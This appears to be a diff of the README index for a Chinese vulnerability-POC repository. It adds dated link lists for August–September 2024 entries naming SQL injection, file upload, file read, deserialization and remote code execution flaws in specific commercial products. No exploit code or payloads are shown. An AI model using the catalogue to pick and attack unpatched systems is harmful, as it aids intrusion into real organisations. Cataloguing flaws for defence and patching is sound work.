+- [众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞](./众诚软件/众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md)
+- [用友NC-Cloud系统show_download_content接口存在SQL注入漏洞](./用友OA/用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md)
+- [Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044)](./Jenkins/Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md)
+- [WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932)](./WordPress/WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md)
+- [Apache-OFBiz远程代码执行漏洞(CVE-2024-45195)](./Apache/Apache-OFBiz远程代码执行漏洞(CVE-2024-45195).md)
+- [用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md)
+- [用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md)
+- [热网无线监测系统GetMenuItem存在SQL注入漏洞](./热网无线监测系统/热网无线监测系统GetMenuItem存在SQL注入漏洞.md)
+
+## 2024.09.02 新增漏洞
+
+- [蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞](./蜂信物联/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md)
+- [紫光电子档案管理系统selectFileRemote存在SQL注入漏洞](./紫光电子档案管理系统/紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md)
+- [中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞](./中兴/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md)
+- [珠海新华通软件股份有限公司云平台存在登录绕过漏洞](./珠海新华通软件股份有限公司/珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md)
+- [Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593)](./Ivanti/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md)
+- [浪潮云财务系统UploadListFile存在任意文件上传漏洞](./浪潮云/浪潮云财务系统UploadListFile存在任意文件上传漏洞.md)
+- [金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞](./金和/金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md)
+- [用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md)
+- [EOVA未授权doInit接口存在反序列化漏洞](./EOVA/EOVA未授权doInit接口存在反序列化漏洞.md)
+- [短剧影视小程序前台base64_image_content任意文件上传漏洞](./短剧影视小程序/短剧影视小程序前台base64_image_content任意文件上传漏洞.md)
+- [短剧影视小程序前台juhecurl任意文件读取漏洞](./短剧影视小程序/短剧影视小程序前台juhecurl任意文件读取漏洞.md)
+- [短剧影视小程序前台未授权漏洞](./短剧影视小程序/短剧影视小程序前台未授权漏洞.md)
+- [某仿soul欲音社交系统存在任意文件读取漏洞](./社交系统/某仿soul欲音社交系统存在任意文件读取漏洞.md)
+
+## 2024.08.28 新增漏洞
+
+- [朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞](./朗新天霁人力资源管理系统/朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md)
+- [全程云OA接口UploadFile存在任意文件上传漏洞](./全程云OA/全程云OA接口UploadFile存在任意文件上传漏洞)
+- [Nacos任意文件读写漏洞](./Nacos/Nacos任意文件读写漏洞.md)
+- [畅捷通CRM系统newleadset.php接口存在SQL注入漏洞](./用友OA/畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md)
+- [智能停车管理系统GetPasswayData存在SQL注入漏洞](./智能停车管理系统/智能停车管理系统GetPasswayData存在SQL注入漏洞.md)
+- [某U挖矿质押单语言系统imageupload后台任意文件上传漏洞](./挖矿质押单语言系统/某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md)
+- [某U挖矿质押单语言系统前台未授权修改管理员密码](./挖矿质押单语言系统/某U挖矿质押单语言系统前台未授权修改管理员密码.md)
+- [某U挖矿质押单语言系统后台phar反序列漏洞](./挖矿质押单语言系统/某U挖矿质押单语言系统后台phar反序列漏洞.md)
+- [SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954)](./SPIP/SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md)
+- [通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞](./通天星/通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md)
+- [同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞](./同鑫eHR/同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md)
+
+## 2024.08.24 新增漏洞
+
+- [汇智ERP系统Upload.aspx存在文件上传漏洞](./汇智ERP/汇智ERP系统Upload.aspx存在文件上传漏洞.md)
+- [超易企业管理系统Login.ashx存在SQL注入漏洞](./超易企业管理系统/超易企业管理系统Login.ashx存在SQL注入漏洞.md)
+- [同享人力管理管理平台SFZService.asmx存在SQL注入漏洞](./同享人力管理管理平台/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md)
+- [九思OA接口WebServiceProxy存在XXE漏洞](./九思OA/九思OA接口WebServiceProxy存在XXE漏洞.md)
+- [泛微ecology9系统接口ModeDateService存在SQL漏洞](./泛微OA/泛微ecology9系统接口ModeDateService存在SQL漏洞.md)
+- [Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏](./Oracle/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md)
+- [金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞](./金和OA/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md)
+- [瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞](./瑞斯康达/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md)
+- [南京星源图科技SparkShop存在任意文件上传漏洞](./南京星源图科技/南京星源图科技SparkShop存在任意文件上传漏洞.md)
+- [SeaCMS海洋影视管理系统index.php存在SQL注入漏洞](./海洋cms/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md)
+- [点企来客服系统getwaitnum存在sql注入漏洞](./点企来客服系统/点企来客服系统getwaitnum存在sql注入漏洞.md)
+- [山石网科应用防火墙WAF未授权命令注入漏洞](./山石网科云鉴/山石网科应用防火墙WAF未授权命令注入漏洞.md)
+- [用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞](./用友OA/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md)
+
+## 2024.08.21 新增漏洞
+
+- [JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞](./JieLink/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md)
+- [正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞](./正方/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md)
+- [LiveGBS任意用户密码重置漏洞](./LiveGBS/LiveGBS任意用户密码重置漏洞.md)
+- [泛微e-cology-v10远程代码执行漏洞](./泛微OA/泛微e-cology-v10远程代码执行漏洞.md)
+- [华夏ERPV3.3存在信息泄漏漏洞](./华夏ERP/华夏ERPV3.3存在信息泄漏漏洞.md)
+- [奥威亚云视频平台UploadFile.aspx存在文件上传漏洞](./奥威亚视频云平台/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md)
+- [万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md)
+- [泛微ecology系统接口BlogService存在SQL注入漏洞](./泛微OA/泛微ecology系统接口BlogService存在SQL注入漏洞.md)
+- [Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞](./电力系统控制软件/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md)
+- [私有云管理平台存在登录绕过漏洞](./私有云管理平台/私有云管理平台存在登录绕过漏洞.md)
+- [微商城系统api.php存在文件上传漏洞](./微商城系统/微商城系统api.php存在文件上传漏洞.md)
+- [微商城系统goods.php存在SQL注入漏洞](./微商城系统/微商城系统goods.php存在SQL注入漏洞.md)
+- [某业务管理系统LoginUser存在信息泄露漏洞](./某业务管理系统/某业务管理系统LoginUser存在信息泄露漏洞.md)
+
+## 2024.08.17 新增漏洞
+
+- [易宝OA-BasicService.asmx存在SQL注入漏洞](./易宝OA/易宝OA-BasicService.asmx存在SQL注入漏洞.md)
+- [章管家updatePwd.htm存在任意账号密码重置漏洞](./章管家-印章智慧管理平台/章管家updatePwd.htm存在任意账号密码重置漏洞.md)
+- [智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞](./智慧校园(安校易)管理系统/智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md)
+- [用友crm客户关系管理help.php存在任意文件读取漏洞](./用友OA/用友crm客户关系管理help.php存在任意文件读取漏洞.md)
+- [方天云智慧平台系统setImg.ashx存在文件上传漏洞](./方天云智慧平台系统/方天云智慧平台系统setImg.ashx存在文件上传漏洞.md)
+- [乐享智能运维管理平台getToken存在SQL注入漏洞](./乐享智能运维管理平台/乐享智能运维管理平台getToken存在SQL注入漏洞.md)
+- [ZoneMinder系统sort接口存在SQL注入漏洞](./ZoneMinder/ZoneMinder系统sort接口存在SQL注入漏洞.md)
+- [WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞](./WookTeam轻量级的团队在线协作系统/WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md)
+- [DeDecms接口sys_verifies.php存在任意文件读取漏洞](./dede/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md)
+- [用友U8-CRM系统接口attrlist存在SQL注入漏洞](./用友OA/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md)
+- [红海云eHR系统pc.mob存在sql注入漏洞](./红海云eHR/红海云eHR系统pc.mob存在sql注入漏洞.md)
+- [用友NC系统FileManager接口存在任意文件上传漏洞](./用友OA/用友NC系统FileManager接口存在任意文件上传漏洞.md)
+- [杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞](./杭州三一谦成科技车辆监控服务平台/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md)
+- [亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md)
+- [亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md)
+- [用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞](./用友OA/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md)
+- [用友U8-CRM接口exportdictionary.php存在SQL注入漏洞](./用友OA/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md)
+- [方正全媒体采编系统存在syn.do信息泄露漏洞](./方正全媒体/方正全媒体采编系统存在syn.do信息泄露漏洞.md)
+- [亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md)
+- [用友NC接口download存在SQL注入漏洞](./用友OA/用友NC接口download存在SQL注入漏洞.md)
+- [科荣AIO管理系统endTime参数存在SQL注入漏洞](./科荣AIO/科荣AIO管理系统endTime参数存在SQL注入漏洞.md)
+- [智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞](./智互联科技有限公司/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md)
+- [东华医疗协同办公系统templateFile存在任意文件下载漏洞](./东华医疗协同办公系统/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md)
+- [智能停车管理系统ToLogin存在SQL注入漏洞](./智能停车管理系统/智能停车管理系统ToLogin存在SQL注入漏洞.md)
+- [AVCON-系统管理平台download.action存在任意文件读取漏洞](./AVCON/AVCON-系统管理平台download.action存在任意文件读取漏洞.md)
+- [AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞](./AVCON/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md)
 
 ## 2024.08.13 新增漏洞
 
-- 用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞
-- 泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞
-- 某短视频直播打赏系统任意文件读取漏洞
-- 某短视频直播打赏系统后台任意文件上传漏洞
-- 章管家listUploadIntelligent接口存在sql注入漏洞
-- 中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞
-- 中成科信票务管理系统TicketManager.ashx存在SQL注入漏洞
-- 喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞
-- 喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞
-- 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞
-- 安美数字酒店宽带运营系统weather.php任意文件读取漏洞
-- 赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞
-- 金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞
-- 亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞
-- 润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞
-- 润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞
+- [用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞.md)
+- [泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞](./泛微OA/泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞.md)
+- [某短视频直播打赏系统任意文件读取漏洞](./某短视频直播打赏系统/某短视频直播打赏系统任意文件读取漏洞.md)
+- [某短视频直播打赏系统后台任意文件上传漏洞](./某短视频直播打赏系统/某短视频直播打赏系统后台任意文件上传漏洞.md)
+- [章管家listUploadIntelligent接口存在sql注入漏洞](./章管家-印章智慧管理平台/章管家listUploadIntelligent接口存在sql注入漏洞.md)
+- [中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞](./中成科信票务管理系统/中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞.md)
+- [中成科信票务管理系统TicketManager.ashx存在SQL注入漏洞](./中成科信票务管理系统/中成科信票务管理系统TicketManager.ashx存在SQL注入漏洞.md)
+- [喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md)
+- [喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md)
+- [喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md)
+- [安美数字酒店宽带运营系统weather.php任意文件读取漏洞](./安美数字酒店宽带运营系统/安美数字酒店宽带运营系统weather.php任意文件读取漏洞.md)
+- [赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞](./赛蓝企业管理系统/赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞.md)
+- [金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞](./金斗云/金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞.md)
+- [亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞.md)
+- [润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞](./润申信息科技ERP系统/润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞.md)
+- [润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞](./润申信息科技ERP系统/润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞.md)
 
 ## 2024.08.10 新增漏洞
 
-- H3C-iMC智能管理中心存在远程代码执行漏洞(XVE-2024-4567)
-- H3C-iMC智能管理中心autoDeploy.xhtml存在远程代码执行漏洞
-- 同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞
-- 亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞
-- 亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞
-- 亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞
-- IP网络广播服务平台upload存在任意文件上传漏洞
-- ALR-F800存在命令执行漏洞
-- Atmail存在SQL注入漏洞
-- ELADMIN后台管理系统存在SSRF漏洞
-- JeecgBoot系统AviatorScript表达式注入漏洞
-- Journyx存在未经身份验证的XML外部实体注入
-- Mtab书签导航程序存在SQL注入漏洞
-- 驰骋BPM系统存在SQL注入漏洞
-- 亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611)
-- 赛蓝企业管理系统SubmitUploadify存在任意文件上传漏洞
-- 用友NC系统接口link存在SQL注入漏洞
-- 大华DSS系统group_saveGroup存在SQL注入漏洞
-- H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传漏洞
-- 科讯一卡通管理系统DataService.asmx存在SQL注入漏洞
-- 三汇网关管理软件debug.php远程命令执行漏洞
-- 万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞
+- [H3C-iMC智能管理中心存在远程代码执行漏洞(XVE-2024-4567)](./H3C/H3C-iMC智能管理中心存在远程代码执行漏洞(XVE-2024-4567).md)
+- [H3C-iMC智能管理中心autoDeploy.xhtml存在远程代码执行漏洞](./H3C/H3C-iMC智能管理中心autoDeploy.xhtml存在远程代码执行漏洞.md)
+- [同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞](./同享人力管理管理平台/同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞.md)
+- [亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞.md)
+- [亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞.md)
+- [亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞.md)
+- [IP网络广播服务平台upload存在任意文件上传漏洞](./IP网络广播服务平台/IP网络广播服务平台upload存在任意文件上传漏洞.md)
+- [ALR-F800存在命令执行漏洞](./路由器/ALR-F800存在命令执行漏洞.md)
+- [Atmail存在SQL注入漏洞](./Atmail/Atmail存在SQL注入漏洞.md)
+- [ELADMIN后台管理系统存在SSRF漏洞](./ELADMIN/ELADMIN后台管理系统存在SSRF漏洞.md)
+- [JeecgBoot系统AviatorScript表达式注入漏洞](./JeecgBoot/JeecgBoot系统AviatorScript表达式注入漏洞.md)
+- [Journyx存在未经身份验证的XML外部实体注入](./Journyx/Journyx存在未经身份验证的XML外部实体注入.md)
+- [Mtab书签导航程序存在SQL注入漏洞](./Mtab书签导航程序/Mtab书签导航程序存在SQL注入漏洞.md)
+- [驰骋BPM系统存在SQL注入漏洞](./驰骋BPM/驰骋BPM系统存在SQL注入漏洞.md)
+- [亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611)](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611).md)
+- [赛蓝企业管理系统SubmitUploadify存在任意文件上传漏洞](./赛蓝企业管理系统/赛蓝企业管理系统SubmitUploadify存在任意文件上传漏洞.md)
+- [用友NC系统接口link存在SQL注入漏洞](./用友OA/用友NC系统接口link存在SQL注入漏洞.md)
+- [大华DSS系统group_saveGroup存在SQL注入漏洞](./大华/大华DSS系统group_saveGroup存在SQL注入漏洞.md)
+- [H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传漏洞](./H3C/H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传漏洞.md)
+- [科讯一卡通管理系统DataService.asmx存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统DataService.asmx存在SQL注入漏洞.md)
+- [三汇网关管理软件debug.php远程命令执行漏洞](./三汇网关管理软件/三汇网关管理软件debug.php远程命令执行漏洞.md)
+- [万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞.md)
 
 ## 2024.08.07 新增漏洞
 
-- 蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181)
-- 世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281)
-- 泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞
-- Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856)
-- 易捷OA协同办公软件ShowPic接口存在任意文件读取
-- SpringBlade系统usual接口存在SQL注入漏洞
-- 宏景eHR系统ajaxService接口处存在SQL注入漏洞
-- 满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞
-- 蓝凌EKP系统dataxml.tmpl存在命令执行漏洞
-- 云时空社会化商业ERP系统online存在身份认证绕过漏洞
-- PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)
-- 赛蓝企业管理系统GetCssFile存在任意文件读取漏洞
-- Calibre任意文件读取漏洞(CVE-2024-6781)
-- Calibre远程代码执行漏洞(CVE-2024-6782)
+- [蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181)](./蓝凌OA/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md)
+- [世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281)](./世邦通信/世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md)
+- [泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞](./泛微OA/泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md)
+- [Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856)](./Apache/Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md)
+- [易捷OA协同办公软件ShowPic接口存在任意文件读取](./易捷OA/易捷OA协同办公软件ShowPic接口存在任意文件读取.md)
+- [SpringBlade系统usual接口存在SQL注入漏洞](./SpringBlade/SpringBlade系统usual接口存在SQL注入漏洞.md)
+- [宏景eHR系统ajaxService接口处存在SQL注入漏洞](./宏景OA/宏景eHR系统ajaxService接口处存在SQL注入漏洞.md)
+- [满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞](./满客宝智慧食堂系统/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md)
+- [蓝凌EKP系统dataxml.tmpl存在命令执行漏洞](./蓝凌OA/蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md)
+- [云时空社会化商业ERP系统online存在身份认证绕过漏洞](./云时空/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md)
+- [PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)](./PerkinElmer/PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md)
+- [赛蓝企业管理系统GetCssFile存在任意文件读取漏洞](./赛蓝企业管理系统/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md)
+- [Calibre任意文件读取漏洞(CVE-2024-6781)](./Calibre/Calibre任意文件读取漏洞(CVE-2024-6781).md)
+- [Calibre远程代码执行漏洞(CVE-2024-6782)](./Calibre/Calibre远程代码执行漏洞(CVE-2024-6782).md)
 
 ## 2024.08.04 新增漏洞
 
-- 同享人力管理管理平台UploadHandler存在任意文件上传漏洞
-- jeecg-boot系统接口jmLink权限绕过漏洞
-- 章管家前台任意文件上传漏洞(XVE-2024-19042)
-- 灵动业务架构平台(LiveBOS)系统UploadFile.do接口文件上传漏洞(XVE-2023-21708)
-- 灵动业务架构平台(LiveBOS)系统UploadImage接口文件上传漏洞(XVE-2024-18835)
-- PEPM系统Cookie存在远程代码执行漏洞(XVE-2024-16919)
-- 用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043)
-- 群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945)
-- 网神SecGate3600未授权添加用户漏洞
-- 海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞
-- 信呼OA系统index存在SQL注入漏洞
-- 泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞
-- 通天星CMSV6车载视频监控平台SESSION伪造漏洞
-- 小狐狸Chatgpt付费创作系统存在任意文件上传漏洞
+- [同享人力管理管理平台UploadHandler存在任意文件上传漏洞](./同享人力管理管理平台/同享人力管理管理平台UploadHandler存在任意文件上传漏洞.md)
+- [jeecg-boot系统接口jmLink权限绕过漏洞](./JeecgBoot/jeecg-boot系统接口jmLink权限绕过漏洞.md)
+- [章管家前台任意文件上传漏洞(XVE-2024-19042)](./章管家-印章智慧管理平台/章管家前台任意文件上传漏洞(XVE-2024-19042).md)
+- [灵动业务架构平台(LiveBOS)系统UploadFile.do接口文件上传漏洞(XVE-2023-21708)](./LiveBOS/灵动业务架构平台(LiveBOS)系统UploadFile.do接口文件上传漏洞(XVE-2023-21708).md)
+- [灵动业务架构平台(LiveBOS)系统UploadImage接口文件上传漏洞(XVE-2024-18835)](LiveBOS/灵动业务架构平台(LiveBOS)系统UploadImage.do接口文件上传漏洞(XVE-2024-18835).md)
+- [PEPM系统Cookie存在远程代码执行漏洞(XVE-2024-16919)](./PEPM系统/PEPM系统Cookie存在远程代码执行漏洞(XVE-2024-16919).md)
+- [用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043)](./用友OA/用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043).md)
+- [群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945)](./群杰印章物联网管理平台/群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945).md)
+- [网神SecGate3600未授权添加用户漏洞](./网神/网神SecGate3600未授权添加用户漏洞.md)
+- [海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞](./海康威视/海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞.md)
+- [信呼OA系统index存在SQL注入漏洞](./信呼OA/信呼OA系统index存在SQL注入漏洞.md)
+- [泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞](./泛微OA/泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md)
+- [通天星CMSV6车载视频监控平台SESSION伪造漏洞](./通天星/通天星CMSV6车载视频监控平台SESSION伪造漏洞.md)
+- [小狐狸Chatgpt付费创作系统存在任意文件上传漏洞](./小狐狸Chatgpt付费创作系统/小狐狸Chatgpt付费创作系统存在任意文件上传漏洞.md)
 
 ## 2024.08.01 新增漏洞
 
-- 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞
-- 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞
-- Quicklancer系统接口listing存在SQL注入漏洞
-- KubePi存在JWT验证绕过漏洞(CVE-2024-36111)
-- Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)
-- Tenda-FH1201存在命令注入漏洞(CVE-2024-41468)
-- 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞
-- 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞
-- 广联达OA系统GetSSOStamp接口存在任意用户登录
-- 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞
-- 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
-- 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞
-- 契约锁电子签章平台ukeysign存在远程命令执行漏洞
-- AspCMS系统commentList.asp存在SQL注入漏洞
-- 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926)
-- 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)
-- 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)
-- 任我行协同CRM系统UploadFile存在反序列化漏洞
-- 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞
-- 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞
-- 3C环境自动监测监控系统ReadLog文件读取漏洞
-- ClusterControl存在任意文件读取漏洞
-- 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞
-- 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞
-- 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞
+- [海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞](./海康威视/海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md)
+- [北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞](./Panalog/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md)
+- [Quicklancer系统接口listing存在SQL注入漏洞](./Quicklancer/Quicklancer系统接口listing存在SQL注入漏洞.md)
+- [KubePi存在JWT验证绕过漏洞(CVE-2024-36111)](./KubePi/KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md)
+- [Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)](./Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md)
+- [Tenda-FH1201存在命令注入漏洞(CVE-2024-41468)](./Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md)
